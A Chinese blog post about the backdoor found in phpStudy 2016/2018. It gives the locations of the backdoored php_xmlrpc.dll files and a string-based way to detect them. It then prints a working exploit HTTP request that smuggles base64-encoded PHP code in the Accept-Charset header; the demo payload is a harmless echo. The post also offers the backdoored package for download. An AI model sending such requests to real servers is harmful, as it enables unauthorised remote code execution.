Phpstudy2016 2018版本后门及利用

原创 sauren  2019-09-26 18:00  阅读 172 views 次 评论 1 条

Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户

2019年9月20日杭州公安微信公众账号发布了“杭州警方通报打击涉网违法犯罪暨“净网2019”专项行动战果”的文章,文章里说明phpstudy存在“后门”,随后其官方公众号内亦证实存在被入侵后种植的后门。

一、后门位置

phpStudy2016和phpStudy2018自带的php-5.2.17、php-5.4.45相应目录下的:

php\php-5.2.17\ext\php_xmlrpc.dll
php\php-5.4.45\ext\php_xmlrpc.dll

 

二、检测方式

使用文本方式打开php_xmlrpc.dll,含有eval(%s(‘%s’))字样即说明存在后门。

三、利用方式(exp)。

GET / HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: ****
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset: ZWNobyAxMjM7
Connection: close

 

Accept-Encoding:gzip,deflate

Accept-Charset: ZWNobyAxMjM7

其中Accept-Charse即为base64编码后的后门利用方式,这里我仅使用echo 123;做一下演示。

含有漏洞的Phpstudy下载地址,有兴趣的朋友可以研究下:

此处为隐藏的内容!
发表评论并刷新,才能查看
本文地址:/archives/310.html
版权声明:本文为原创文章,版权归 sauren 所有,欢迎分享本文,转载请保留出处!
NEXT:已经是最新一篇了
高性能云服务器特惠

发表评论


表情

  1. 123
    123 @回复

    看看